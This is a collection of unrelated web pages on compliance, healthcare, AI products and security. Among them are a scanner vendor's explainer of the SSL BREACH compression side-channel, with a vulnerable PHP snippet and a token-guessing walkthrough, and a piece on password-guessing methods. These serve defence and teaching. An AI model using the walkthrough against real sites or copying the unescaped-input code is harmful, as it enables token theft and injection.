Section 302.5.A&B – Detect Security Breaches Requires detection of security breaches due to flaws within the security system, control system or fraud.
Section 404 – Management assessment of internal controls – Requires that safeguards stated within Section 302, as well as other sections of the act, be externally verifiable by independent auditors. Specifically, this section guarantees that the security of data cannot be hidden from auditors, as auditors disclose to shareholders and the public any security breaches that affect company finances.
Important subsections include:
Section 404.A.1.1 – Disclose security safeguards to independent auditors.Relates to management of appointed auditors, requiring them to review control structures and procedures used for reporting financial information. Security framework, and those responsible for the operation of the security framework, must be disclosed to auditors.
Section 404.A.2 – Disclose security breaches to independent auditors.Requires auditors to assess the effectiveness of the internal control structure. The general effectiveness of the security framework must be measured and disclosed.
Section 404.B – Disclose failures of security safeguards to independent auditors.Requires auditors to be aware of (and report on), changes to internal controls, and possible failures that could affect internal controls. Verification must exist showing security framework is operational and effective.
As you can see, compliance with the Sarbanes-Oxley Act differs from both HIPAA and GLBA, as it does not contain requirements for retention of specific record types, media or recovery time objectives. Simply put, HIPAA and GLBA were designed to protect patient and customer confidentiality. SOX was designed to protect the shareholder’s “transparent” view of a company.
Many of the same strategies for HIPAA and GLBA compliance can aid in compliance with the Sarbanes-Oxley Act. Strong data security, employee education, access controls, secure data storage and an intelligent business continuity plan are not just smart business, they also provide the most solid foundation for compliance requirements.
For the final blog post in this series, we will look at Payment Card Industry Data Security Standard, PCI DSS.
Gwen Thomas and Amy Klutz. 2003-2012. SOX-online. Accessed April 8, 2014. http://www.sox-online.com/.
PCI Security Standards Council, LLC. 2010. "PCI Security Standards Resources." October. Accessed April 13, 2014. https://www.pcisecuritystandards.org.
RAND Institute for Civil Justice . 2007. Do the Benefits of Sarbanes-Oxley Justify the Costs? Accessed April 9, 2015. http://www.rand.org/pubs/research_briefs/RB9295/index1.html.
U.S. Securities and Exchange Commission. n.d. U.S. Securities and Exchange Commission. Accessed April 9, 2015. https://www.sec.gov/info/smallbus/404guide.pdf. | <urn:uuid:ad049452-d74c-4d67-b3b3-798aca0381a3> | CC-MAIN-2024-38 | https://www.itispivotal.com/post/sarbanes-oxley-compliance-transparency-and-responsibility | 2024-09-07T20:39:38Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650920.0/warc/CC-MAIN-20240907193650-20240907223650-00777.warc.gz | en | 0.937763 | 1,168 | 2.9375 | 3 |
By forcing the user to make a lot of requests towards a web server, an attacker is able to extract information from the page even though https is used, assuming both the browser and web server are vulnerable against SSL BREACH.
This vulnerability has been resolved in all popular web browsers and as such, it only affects people with old outdated web browsers. It is therefore understandable if you do not consider this a threat. If that is the case, please mark the finding as Accepted Risk and it will automatically be filtered out in future reports.
What can happen?
An attacker will be able to extract information from the page even though https is used. This information may be any information displayed on the page or in client side code. Common examples would be user information, CSRF tokens or credit card data.
Detailed information how the attack work
Assume we have a page that looks like this:
$token = "abcdef";
echo "Hi $_GET['user']! <br>";
echo "Your secret token is $token.";
If we make the user (e.g. by buying an ad on a popular website we know the target visits regularly) send several requests, the first one being as follows: https://example.com/?user=admin
The page will look like this:
Your secret token is asdef.
Now imagine the response was 100 bytes (made up number).
If we now trick the user into making the following request, https://example.com/?user=adsf, the response will only be 90 bytes as there is a overlap between token and user. When there is a overlap the compression can make the response smaller.
This makes it possible to bruteforce the token, so to say. ?user=axxxx generates 99 bytes, ?user=aaxxx 99 bytes, ?user=abxxx 98 bytes etc. Trying each character until we get a partial and eventually full overlap allows us to figure out the token even though all the traffic is actually encrypted with HTTPS.
The issue can be remediated either in the server or in the web browser. For this to be exploitable both parties must allow the dangerous request. Due to this and the fact that every popular browser has already mitigated SSL breach, some do not consider this to be a security issue anymore. This is the accepted view on it, and if you agree, you can mark the finding as Accepted Risk and it will be automatically filtered out in the future.
The best approach to mitigate this issue server side (and what our scan looks for) is to disable HTTP compression. How that is done depends on your server setup. | <urn:uuid:56d270fe-9d6d-4e7b-927e-8354de695a9e> | CC-MAIN-2024-38 | https://support.detectify.com/support/solutions/articles/48001048976-ssl-breach | 2024-09-10T07:30:58Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651224.59/warc/CC-MAIN-20240910061537-20240910091537-00577.warc.gz | en | 0.933358 | 543 | 2.9375 | 3 |
Category: Software > Computer Software > Educational Software
Tag: AI, API, Azure, Computer Vision, microsoft
Availability: In stock
Price: USD 9.99
By the end of this project, you will have successfully created an Azure account, logged into the Azure Portal, created a Computer Vision Cognitive Services resource and use it by executing API calls to generate predictions. You will learn to execute API calls to the pre-built Computer Vision resource through a series of tasks which include creating the appropriate resource to realize the API calls and then providing a clear example through the Microsoft API portal on how these can be executed. The skills learned in this guided project will provide the foundation to understanding and implementing Artificial Intelligence & Machine Learning solutions in Microsoft Azure.
Interested in what the future will bring? Download our 2024 Technology Trends eBook for free.
If you enjoy this project, we recommend taking the Microsoft Azure AI Fundamentals AI-900 Exam Prep Specialization: https://www.coursera.org/specializations/microsoft-azure-ai-900-ai-fundamentals | <urn:uuid:4c865cbc-575f-48e4-a243-08bbe25dbde7> | CC-MAIN-2024-38 | https://datafloq.com/course/build-a-computer-vision-app-with-azure-cognitive-services/ | 2024-09-11T12:57:22Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651387.63/warc/CC-MAIN-20240911120037-20240911150037-00477.warc.gz | en | 0.855288 | 220 | 3.015625 | 3 |
In the realm of cybersecurity, various threats lurk in the digital world, waiting to exploit vulnerabilities and wreak havoc on unsuspecting victims. One such insidious threat is spyware. Let’s delve into what spyware is, how it operates, and tactics and prevention measures against this type of cyber attack.
What is Spyware?
Spyware is a type of malicious software (malware) designed to secretly monitor and collect information about a user's online activities, personal data, and system configuration. Cybercriminals use spyware to gain unauthorized access to sensitive information, such as login credentials, financial data, or confidential documents, which can then be used for identity theft, fraud, or corporate espionage.
Spyware can infiltrate your devices through various means, including deceptive downloads, phishing emails, malicious websites, or software vulnerabilities. Once installed, it typically runs in the background, hidden from the user, and transmits the collected data to the attacker's remote server.
There are several types of spyware, each serving a specific purpose:
- Keyloggers: These programs record keystrokes, allowing attackers to capture login credentials, credit card numbers, and other sensitive information typed on a keyboard.
- Trojans: Trojans disguise themselves as legitimate software or hide within seemingly harmless files. Once installed, they can deliver spyware or other malware onto the victim's device.
- Adware: Adware tracks a user's browsing habits and delivers targeted advertisements. While not always malicious, some adware can also collect personal information without the user's consent.
- Mobile spyware: This type of spyware targets smartphones and tablets, monitoring calls, messages, GPS locations, and other sensitive data.
Tactics and Prevention Measures Against Spyware
To protect yourself from spyware, it is crucial to adopt a proactive approach and employ robust security measures. Here are some tactics and prevention tips to help safeguard your devices and data:
- Install a reputable antivirus software: A comprehensive antivirus solution can detect and remove spyware, as well as protect against other types of malware. Regularly update your antivirus software to ensure it can recognize the latest threats.
- Keep your operating system and applications updated: Software updates often include security patches that fix known vulnerabilities. Regularly updating your devices and applications can help prevent spyware from exploiting these weaknesses.
- Be cautious with downloads: Only download software and files from trusted sources, such as official websites or app stores. Avoid downloading content from suspicious emails or websites, as they may contain hidden spyware.
- Use strong, unique passwords: Strong, unique passwords make it more difficult for attackers to gain unauthorized access to your accounts. Consider using a password manager to generate and store complex passwords securely.
- Enable two-factor authentication (2FA): 2FA adds an extra layer of security by requiring a second form of verification, such as a fingerprint or a one-time code, in addition to your password. This makes it more challenging for attackers to access your accounts, even if they have your login credentials.
- Be wary of phishing emails: Phishing emails often contain malicious attachments or links that can deliver spyware onto your device. Be cautious when opening unexpected emails, especially if they prompt you to download files or click on unfamiliar links.
- Regularly back up your data: Regularly backing up your data ensures that you have a secure copy of your essential files in case your device becomes compromised by spyware or other malware.
By implementing these tactics and prevention measures, you can significantly reduce the risk of falling victim to spyware attacks. Stay informed about the latest cyber threats, maintain a proactive security posture, and safeguard your digital assets. Remember, the best defense against spyware is a combination of awareness, vigilance, and robust security practices. | <urn:uuid:90490ca6-a0a3-4d0c-92bd-7f35ed3fcd27> | CC-MAIN-2024-38 | https://www.hooksecurity.co/glossary/what-is-spyware-understanding-spyware-popular-tactics-and-prevention | 2024-09-15T07:16:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651616.56/warc/CC-MAIN-20240915052902-20240915082902-00177.warc.gz | en | 0.898627 | 778 | 3.59375 | 4 |
哲学分析师-AI-powered multidisciplinary analysis
AI-driven insights in philosophy, sociology, and psychology.
Load MorePhilosophy Sage
Philosophy and critical thinking expert, adept in various philosophical topics.
Guiding explorations of life's big questions with a focus on William Search's Moral Compass Theory and other philosophical perspectives.
🔷#𝟏 𝐏𝐞𝐫𝐬𝐨𝐧𝐚𝐥𝐢𝐳𝐞𝐝 𝐏𝐡𝐢𝐥𝐨𝐬𝐨𝐩𝐡𝐲 𝐓𝐮𝐭𝐨𝐫🔷
Explore Philosophy (Philosophy Tutor)
Got a hot take? This GPT surveys the history of philosophy and brings you good (and bad) arguments for nearly any opinion!
Wise philosopher, deep thinker, and guide in the realm of philosophy.
Filosofía especializada profesional
Eres un experto en filosofía que explica filosofía para especializados y no de manera divulgativa
20.0 / 5 (200 votes)
Introduction to 哲学分析师
哲学分析师, or 'Philosophy Analyst', is a customized version of ChatGPT, designed to provide in-depth analysis and understanding across philosophy, sociology, and psychology. Its main function is to bridge the gaps between these disciplines, offering comprehensive insights and connections that enhance the user's knowledge and critical thinking skills. 哲学分析师 caters to those seeking a deeper understanding of complex concepts, emphasizing clarity, accuracy, and a multidisciplinary perspective. For instance, it can analyze philosophical texts, compare sociological theories, and explain psychological phenomena, all while highlighting their interrelations.
Main Functions of 哲学分析师
Analyzing the ethical implications of artificial intelligence.
A user wants to understand the ethical considerations of AI in healthcare. 哲学分析师 provides an analysis drawing from deontological and utilitarian perspectives, highlighting potential conflicts and resolutions.
Sociological Theory Application
Explaining the concept of social stratification.
A student is writing a paper on social inequality. 哲学分析师 explains social stratification using theories from Karl Marx, Max Weber, and Pierre Bourdieu, providing examples of how these theories apply to modern society.
Psychological Concept Clarification
Describing cognitive dissonance.
A user is curious about why they feel uncomfortable after making a decision that contradicts their beliefs. 哲学分析师 explains cognitive dissonance, using real-life examples to illustrate how people resolve such discomfort.
Ideal Users of 哲学分析师
Students and Academics
Students and academics in the fields of philosophy, sociology, and psychology benefit greatly from 哲学分析师. It aids in research, offers clear explanations of complex theories, and provides multidisciplinary perspectives that enrich their studies and academic work.
Lifelong Learners and Enthusiasts
Individuals with a keen interest in understanding human behavior, social structures, and philosophical thought find 哲学分析师 a valuable resource. It helps them explore and connect ideas across disciplines, fostering a deeper appreciation and comprehension of the world around them.
How to Use 哲学分析师
Visit aichatonline.org for a free trial without login, no need for ChatGPT Plus.
Familiarize yourself with the platform’s interface, ensuring you know where to input queries and access tools like Python, browser, and DALL-E.
Prepare your queries by clearly defining your topics of interest in philosophy, sociology, or psychology for in-depth analysis.
Use 哲学分析师 to explore complex topics, asking specific questions and requesting multidisciplinary perspectives for comprehensive insights.
Review the responses provided, utilize the additional academic references suggested, and apply the insights to your academic or personal projects.
Try other advanced and practical GPTs
AI-Powered Expertise for Japanese Tax Laws
画图梦想家 🌟 绘画高清想象力
AI-powered detailed and imaginative image creation tool
AI-powered translation and writing assistance.
AI-powered tool for accounting solutions
AI-powered insights for films and TV.
AI-powered image creation tool
AI-powered custom LINE stickers
AI-powered math adventures for all students
AI-powered language translation made easy.
AI-Powered Customer Communication Solution
Create stunning AI-generated images effortlessly.
AI-powered Japanese OCR tool
- Academic Writing
- Exam Preparation
- Professional Research
- Theory Exploration
- Multidisciplinary Analysis
Detailed Q&A about 哲学分析师
What is 哲学分析师?
哲学分析师 is an AI-powered tool designed to provide deep insights and comprehensive analysis in the fields of philosophy, sociology, and psychology. It offers multidisciplinary perspectives, making complex topics accessible and comprehensible.
How can 哲学分析师 help in academic writing?
哲学分析师 can assist in academic writing by offering detailed explanations, comparisons, and connections among ideas from philosophy, sociology, and psychology. It provides high-quality academic references and helps in structuring arguments with well-rounded perspectives.
Can 哲学分析师 be used for professional research?
Yes, 哲学分析师 is an invaluable resource for professional research, offering in-depth insights, objective analyses, and extensive academic references in philosophy, sociology, and psychology, aiding researchers in developing well-informed and comprehensive studies.
What are some common use cases for 哲学分析师?
Common use cases include exploring philosophical theories, understanding sociological phenomena, analyzing psychological concepts, preparing for academic exams, writing research papers, and gaining multidisciplinary perspectives on complex topics.
Is prior knowledge required to use 哲学分析师 effectively?
While prior knowledge in philosophy, sociology, or psychology can be helpful, it is not required. 哲学分析师 is designed to cater to both beginners and advanced users, providing clear and comprehensive insights regardless of the user’s background. | <urn:uuid:c21fe007-d11d-4858-9a10-5662e1d1a67e> | CC-MAIN-2024-38 | https://theee.ai/tools/%E5%93%B2%E5%AD%A6%E5%88%86%E6%9E%90%E5%B8%88-2OToA6rY50 | 2024-09-20T04:51:25Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652130.6/warc/CC-MAIN-20240920022257-20240920052257-00677.warc.gz | en | 0.798277 | 1,481 | 2.578125 | 3 |
The article written by Soroush Saghafian delves into the complex issue of hospital closures in the United States, analyzing the key factors contributing to these closures, the adaptations by healthcare providers, and the resulting public impacts. This comprehensive study highlights the urgent need for informed policies to mitigate the negative consequences of hospital closures, particularly in light of the exacerbating effects of the COVID-19 pandemic.
Main Drivers of Hospital Closures
One of the principal drivers of hospital closures is financial instability. Hospitals often operate on narrow margins and struggle with reduced reimbursement rates from government payers such as Medicare and Medicaid, uncompensated care for uninsured patients, and rising operational costs. These challenges are intensified for rural hospitals due to smaller patient populations and difficulties in retaining physicians.
Healthcare Policy Changes
Healthcare policies at both state and federal levels significantly impact hospital revenues and operations. Changes in Medicare reimbursement rates and Medicaid expansion decisions can drastically alter the number of insured patients and the financial stability of healthcare facilities. Funding mechanisms like the Disproportionate Share Hospital (DSH) payment and the Critical Access Hospital (CAH) program have been altered over time, affecting hospitals’ ability to manage financial challenges.
Industry Consolidation and Vertical Integration
The rapid consolidation within the healthcare industry, where larger hospital systems acquire smaller, independent hospitals or physician practices, leads to the closure of facilities deemed redundant or uncompetitive. This trend has resulted in fewer operational small hospitals and higher market dominance by large healthcare systems.
Changes in population demographics, such as aging populations, alter the demand for specific healthcare services. Rural hospitals are particularly vulnerable as the physician workforce ages and patient mobility changes, especially during events like the COVID-19 lockdowns.
Patients’ tendency to bypass local hospitals in favor of larger, perceived higher-quality institutions reduces local hospitals’ demand, financially straining these facilities and increasing the risk of closure.
Technological advances like telemedicine and mobile health (mHealth) technologies reduce the need for in-person hospital visits, thereby decreasing demand for hospital services and impacting revenues. This shift has forced some hospitals to reevaluate their service offerings and operational models.
Adaptations by Nearby Hospitals
Upon a hospital’s closure, nearby hospitals must manage the sudden surge in patient demand. Research suggests that these hospitals typically enhance their operational efficiency by speeding up service delivery instead of expanding capacity, which can negatively impact care quality. For example, the increased throughput may lead to shorter service durations but can result in higher 30-day mortality rates and other care quality degradation.
Physicians affected by hospital closures face numerous challenges in continuing their careers. Some explore alternative practice models like telemedicine, relocate, open new practices, or even retire. How easily physicians adapt depends on their specialty, professional network, and financial resources. Hospitalists, emergency medicine physicians, anesthesiologists, and OB/GYNs often face the greatest challenges, given their reliance on hospital-based settings.
Public and Policy Impacts
Hospital closures have far-reaching effects beyond immediate patient access issues, impacting providers and the broader healthcare system. The spillover effects, such as quality of care decline in nearby hospitals and regional mismatches in physician supply and demand, underscore the need for comprehensive policy interventions. Effective policy measures might include financial support mechanisms for at-risk hospitals, monitoring service quality post-closure, and promoting telehealth and other innovative care delivery models in underserved areas.
The article authored by Soroush Saghafian delves deeply into the intricate issue of hospital closures across the United States. It examines the key factors driving these closures, such as financial strain, changes in patient demographics, and evolving healthcare policies. Additionally, the study explores how healthcare providers are adapting to these closures through various means, such as consolidation and telemedicine, and assesses the consequent impacts on public health. Saghafian’s analysis underscores the urgent requirement for well-informed policies aimed at alleviating the negative repercussions of hospital closures. These consequences can be particularly severe in rural areas where access to medical care is already limited. The COVID-19 pandemic has further intensified the situation, highlighting the vulnerabilities in the healthcare system and amplifying the need for swift, effective action. This comprehensive review calls for policymakers to take immediate steps to address these issues, ensuring that communities do not suffer due to a lack of local medical facilities. | <urn:uuid:d095ec85-d78a-4ede-998b-685fad99e4c4> | CC-MAIN-2024-38 | https://healthcarecurated.com/management-and-administration/how-do-hospital-closures-affect-healthcare-policy-and-public-health/ | 2024-09-09T05:24:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651072.23/warc/CC-MAIN-20240909040201-20240909070201-00777.warc.gz | en | 0.937082 | 902 | 2.671875 | 3 |
The correct handling of passwords is very important, as attacks such as phishing or identity theft are increasingly successful. On the 1st Thursday in May, World Password Day, we will show you what you need to consider when dealing with passwords and why the password could soon be abolished!
Secure password – How do I create it?
There are several approaches to guessing a password. Three classic methods of guessing passwords are as follows
- the dictionary attack
- the creation of a personalized password list
- the brute force method
As a user, we should choose a password that can withstand all 3 attacks. On World Password Day we’ll show you how to do that – and why it’s time to slowly separate from the relic.
language known? Then a dictionary attack can be successful!
In a dictionary attack, the attacker uses the entire dictionary and tries each word as a password. Once the complete dictionary has been tried out, the dictionary can be supplemented or modified with numbers or variants.
Attackers thus increase the probability of finding what they are looking for in the next run. Passwords like Martin0815, 0688Abschleppsein or Donaudampfschifffahrtskapitän3 can be guessed so quickly. As users, we should consider a password that does not appear in any dictionary.
Dog, cat, mouse – the personalized password list
In this attack, the attacker creates his own password list for a specific victim. Unlike a dictionary attack, the attacker does not use a general list, but adapts a list of information that the victim has disclosed about himself. Popular information is, for example, the names of children, pets, or favorite teams.
The source for this is often professional and private social networks. As users we should not include any personal reference in our passwords, because otherwise an attacker could come upon our password after thorough research.
With brute force – the brute force method
This simple attack consists of trying out all the possibilities. It does not follow any particular systematics. It offers itself to begin with the alphabet or the 0 and to try out combinations. This procedure is very time-consuming because it takes a lot of time. Offline password attacks, e.g. on encrypted documents, are quickly successful with this approach, since many millions of passwords can be tried out, sometimes per second.
Stolen data? Then the most secure password does not help!
Another possibility is to search for data that has already been stolen. Meanwhile more than 7.500.000.000 records have been stolen. The probability that the target is a victim increases from data theft to data theft. If the data has been stolen in plain text, a 40-digit password will not help even at the end of the day.
Anyone can check whether their own data has already been stolen. The Identity Leak Checker from the Hasso-Plattner-Institute in Potsdam enables a check. For this reason alone, different passwords should be used for several platforms different passwords.
Creation of a good, secure password!
So a good password has:
- enough characters to make a brute force attack as tedious as possible
- is not a word from the dictionary and
is not a word from the dictionary
- has no personal reference.
But how to create such a password and how to remember it? To create a good password, you can take a sentence that you can easily remember. You should change this sentence now. E.g. you delete all letters except the last one in every word. If you also insert numbers and special characters and work with replacements, you get a password that can withstand all the above attacks. The BSI has also published a Guide for creating passwords.
In order to remember all the passwords you have created in this way, it is recommended to use a password manager. A possible free software is e.g. KeePassXC or KeePass. The software can also create secure passwords – but this requires the necessary trust.
The ultimate security – does it even exist?
There will never be a 100% security regarding passwords, because the attacker with luck can always get the password. As a user of various services, however, you are more secure if you create passwords according to the above rules. The allocation and administration of secret phrases is quite a challenge. The XignSys GmbH from Gelsenkirchen wants to solve this problem in society – and is thus also on the best way.
Under the motto “World password day – The last of its kind” the company shows which future possibilities it can give and why the password has served its time! | <urn:uuid:70133988-604f-4112-9c4e-75f14cdae071> | CC-MAIN-2024-38 | https://aware7.com/blog/world-password-day-the-last-of-its-kind/ | 2024-09-11T16:23:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651390.33/warc/CC-MAIN-20240911152031-20240911182031-00577.warc.gz | en | 0.937654 | 960 | 3.34375 | 3 |
By Rich Loeber
While the IBM i operating system has very good features for controlling password selection, sometimes your password policy just can't be enforced without additional checking. You may have a list of reserved words that you specifically do not want anyone using as a password. Or, you may have some very stringent requirements that are just not covered by the system values that control password assignment in IBM's i/OS.
When this happens, the only solution is to code your own password validation routine. This can be coded in any high level language. The operating system passes four parameters to your program, one of which is a single character return code. Once you've had a chance to complete your validation testing, just set the return code to the value you want and exit your program. If you set the return code to zero ('0'), then the operating system will assume that your password is acceptable and the password is updated. The parameters passed are, in order, the new password, the old password, the return code and the user profile for a total of 31 characters.
To tell the operating system that you now have your own password validation program in place, you need to update the system value "Password validation program" (QPWDVLDPGM). It is shipped from the factory set to *NONE. To use your own program, just change this value to your program name and library name. It is recommended that you store this program object in the QSYS library so that it is always saved when you backup your operating system.
Once your program is in place, test it to make sure that it is getting called. Use the CHGPWD command and intentionally use a password that will cause your routine to fail. You will see that a message is displayed indicating that the password rules are not met along with the value of the return code that you used. By varying the return code for different situations, you can give your support team a heads up as to the exact reason for the password failure. While you're completing your testing, make sure that you process a valid password change to make sure that normal changes are not adversely affected by your new validation routine.
Registering your specific program with the QPWDVLDPGM system value will only work if you are using default 10 character user profiles and passwords. If you are using the newer long passwords, then you will have to write an exit program and register it using the exit point registration facility. If you take this path, then the QPWDVLDPGM system value must get set to the special setting of *REGFAC and the exit program is registered by the WRKREGINF command. Beware, however, that the parameters for the exit point are very different. There is a good example of the format needed for this exit program in the IBM security guide.
One thing to watch out for in this process is that the passwords, both old and new, are passed to your program without any encryption. So, do not store any values received in a database file as this will compromise security on your system. In fact, you should periodically check this system value to make sure that it does not change and that the program processing additional validation rules remains unchanged. This could easily be abused on your system, so lock up the program object.
If you'd be interested in receiving a sample program for default 10 character password validation, I've written one just to test how this works on my system. Let me know and I'll send the program shell to you. If you have any questions about this topic you can reach me at rich at kisco.com, I'll try to answer any questions you may have. All email messages will be answered. | <urn:uuid:a744d0d6-69bb-4d48-9678-4446de5c7077> | CC-MAIN-2024-38 | https://www.kisco.com/ibm-i-security-tips/custom-password-validation-program-2.html | 2024-09-11T15:55:07Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651390.33/warc/CC-MAIN-20240911152031-20240911182031-00577.warc.gz | en | 0.937918 | 751 | 2.6875 | 3 |
Artificial Intelligence of Things: The Future of IoT Operations
Many organizations are incorporating AI into their business operations, and the results have been overwhelmingly positive .
The Artificial Intelligence of Things is taking this concept to the next level by embedding intelligence into physical objects and devices.
Artificial Intelligence of Things needs a deep insight into both the IoT technologies and the organization’s business processes.”
Artificial Intelligence of Things requires a basic level of expertise in both programming and domain knowledge.
The artificial intelligence of things is about linking intelligent machines with other machines in order to share knowledge and learn from each other.
Artificail Intelligence drawing
One of the most powerful AI applications is computer vision which is being used to scan images and identify objects.
Jarvis Artificail Intelligence
Jarvis AI is an artificial intelligence (AI) system for managing the IoT
The olive AI platform is a suite of machine learning modules that allow you to create your own apps to automate the world around you.”
AI suite 3 is a new application that offers a single dashboard for all of your AI needs. With this new app, you can choose from a selection of predefined planners and agents to suit the task at hand.. | <urn:uuid:9a36d3c9-12f8-4b6f-a6c5-b889e350e627> | CC-MAIN-2024-38 | https://insights2techinfo.com/web-stories/artificial-intelligence-of-things/ | 2024-09-12T21:26:03Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651498.46/warc/CC-MAIN-20240912210501-20240913000501-00477.warc.gz | en | 0.931093 | 248 | 2.625 | 3 |
As cybersecurity becomes increasingly vital to the way we manage our computer systems, it’s important to look across our social systems and make sure that every facet is secured.
Police forces are one such social system, containing a particularly large amount of sensitive data and assets. It is crucial to understand not only why the police can be a target for cybersecurity threats but what they can do to mitigate those threats.
Why police forces are a target for cybersecurity breaches
First, let’s look at why cybercriminals might want to target police forces. Because, as unfortunate as it is, these groups can be a surprisingly common target on the lists of attackers. In fact, in 2021 alone, 26 US Government agencies were targeted by ransomware attacks.
Abundant data to be stolen or compromised
One of the main reasons that the police are a target for cybersecurity threats is that they store and accrue a huge amount of data. That data is crucial to the operations of the justice system, keeping track of evidence, criminal databases, reports, and much more.
This means that a successful attack can lead to this data being stolen or compromised. From there, it can be used in leaks, held for ransom, sold to the highest bidder, or worse. Leaked data can have implications for criminal justice proceedings, interfering with trials, subpoenas, and indictments, directly impacting the lives of real people.
Additionally, a significant portion of the cyberattacks levied against police systems are carried out for cyberespionage purposes. If this data reaches the wrong hands it can pose a national security risk.
Sensitive data is at the core of why police forces need to invest in cybersecurity, though it’s far from the only threat facing the police.
Many departments are using outdated technology
Another major concern that makes the police a target for cybercrime activity is that many departments are using outdated technology. A survey of police officers in the UK revealed that only half of officers felt they could trust the data on their systems and 35% did not have access to a computer at work.
This can be the result of limited budgets and/or resources being spent in other areas.
However it happens, many police forces are using old software and hardware that is more vulnerable to a cyberattack. And for many, updating isn’t always an option that can be taken right away.
As such, investing in cybersecurity is key. Cybersecurity systems can help take the place of upgrading old technology, providing security even while the tech itself might be less than secure.
Cloud-based solutions, such as Logpoint’s SIEM integrations, could be a good route to explore for police forces. The ease of deployment, maintenance, and update support allows for a quick, cost-effective cybersecurity system to be implemented where it is needed most.
However, there is always a risk when highly sensitive data is stored in the cloud that it might be vulnerable to attack. It may be more prudent for police forces to keep such data on-premises to ensure it can be closely monitored, in which case an on-premises solution would be more appropriate.
Critical services and systems are at risk
Cybercriminals can use cybersecurity attacks as a way to disable critical services and systems. This can be a byproduct of a cyberattack or the primary goal.
Either way, it’s often easier than you may suspect to take critical services and systems offline, once that happens, a variety of serious consequences can ensue. For example, if police dispatch centers are hacked, it can prevent people from making calls to the emergency services and getting the urgent help they need.
Criminals can use this as a way to extort money from police departments, commit crimes while systems are down, and otherwise exploit the situation for personal gain. This is one of the most serious consequences of poor cybersecurity and is something that should be addressed as a matter of urgency.
How Logpoint secures data for police force environments
Fortunately, police departments aren’t left defenseless. There are services available, like those offered by Logpoint, that can help police forces protect themselves against the growing threat of cybersecurity risks.
Combine all of your security intel into a single platform
Logpoint can help police departments around the world secure their data, systems, and assets by combining all of your security intel and services into a single platform.
It’s not uncommon to find departments using a variety of services in a mix-and-match workflow. While this can be effective at mitigating threats, it slows down response times, can become confusing, and often winds up being more trouble than it’s worth.
Logpoint resolves this by merging all of your intel into a single point of access.
Provides PII access monitoring
Logpoint provides Personal Identifiable Information (PII) access monitoring. That means that Logpoint can be used to secure access to sensitive, identifying data.
This is the kind of data that police departments typically have stored in abundance, and it’s also the kind of data that cyber criminals actively seek out. Logpoint can help you secure this data with ease.
Covers the discrepancies between business-critical systems
Logpoint also provides services that can cover the discrepancies between business-critical systems. This can help departments spot internal threats and errors, catch access violations early, and more.
EAL 3+ Certified
Logpoint were the first European provider of SIEM solutions to be granted EAL 3+ certification. This certification means that our software has been examined, verified, and documented to the Common Criteria standard and is authorized for deployment in industries and sectors with extremely high security standards such as defence, police, and intelligence.
For more information on how Logpoint can help boost the cybersecurity of your police force, reach out to our team of experts today. | <urn:uuid:d5ce5aaa-365d-4fe8-bc21-d79b228bcf3e> | CC-MAIN-2024-38 | https://www.logpoint.com/en/blog/securing-police-force-data/ | 2024-09-14T05:27:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651548.18/warc/CC-MAIN-20240914025441-20240914055441-00377.warc.gz | en | 0.957025 | 1,199 | 2.734375 | 3 |
Jellyfish Robot Designed for Underwater Missions
The team used shape memory alloys and polyamide to create a flexible, swimming robot
A jellyfish-inspired robot has been created to complete underwater missions, capable of monitoring marine life and underwater infrastructure.
The soft robot was created by a team from the Indian Institute of Technology Indore and the Indian Institute of Technology Jodhpur, using polyamide and shape memory alloys (SMAs).
SMAs are chosen for their deformable properties, capable of changing shape and returning to their original form in response to heat. In this instance, the material allows the robot to mimic the flowing movement of a jellyfish to allow its gentle movement through water.
The flexible, light robot weighs only 1.5 ounces and uses affordable materials, making it easily scalable and accessible to produce.
“The proposed structure is novel, cost-effective, and easy to fabricate with very less time consumption compared to conventional mold-based methods,” the team wrote in the paper. “The results show that the proposed method can be successfully applied to mimic jellyfish locomotion and extended to underwater applications.”
The robot prototype is also fitted with an onboard camera module and sonar sensor for object detection.
In initial tests, the robot prototype showed promising results, swimming horizontally at 0.3 inches per second.
"The behavior of the proposed jellyfish structure has been investigated with varying SMA wire diameters and frequencies," the team said. "The jellyfish tentacle displacement and velocity during mimicking were measured… In addition, a preliminary simulation of the jellyfish mimicking has been carried out in Ansys Fluent and the thrust force has been evaluated."
According to the team, the new robot could be further developed for more specific applications for underwater use cases and accelerate it into commercialization.
About the Author
You May Also Like | <urn:uuid:bf3f889e-e9f2-4299-9497-a2d7fbfadd96> | CC-MAIN-2024-38 | https://www.iotworldtoday.com/robotics/jellyfish-robot-designed-for-underwater-missions | 2024-09-19T00:57:13Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651944.55/warc/CC-MAIN-20240918233405-20240919023405-00877.warc.gz | en | 0.950107 | 386 | 2.703125 | 3 |
There are two basic design approaches to MEMS optical switches; each has its advantages and drawbacks.
Marc Fernandez and E. Kruglic
Optical Micro Machines Inc.
The holy grail of the all-optical crossconnect is finally within reach. This year, micro-electromechanical systems (MEMS) technology leaped from the laboratory to the field in optical-switching applications. We've seen demonstrations of MEMS-based optical switches routing live data traffic. The promise of thousands of photonic data-channel ports switched-all optically transparent to wavelength, data-rate, and signal format-is imminent.
MEMS is a relatively new technology that builds complex machines so small that these systems are measured in microns. Although not widely publicized, MEMS technology has been deployed for over a decade in multiple applications such as airbag sensors (accelerometers), pressure sensors, displays, adaptive optics, scanners, printers, data storage, and micro-fluidics. Some of these micro-machines have gears smaller than motes of dust. Although many MEMS structures look familiar when viewed under a microscope, their function is governed by forces that do not affect traditional machines. Micro-machines are more subject to atomic forces and surface science than to gravity or inertia.MEMS devices typically combine electronic circuitry with mechanical structures to perform specific tasks. For optical switches, the key mechanical components are MEMS-based micro-machined mirrors fabricated on silicon chips using well-established, very-large-scale integration (VLSI) complementary metal-oxide semiconductor (CMOS) foundry processes.
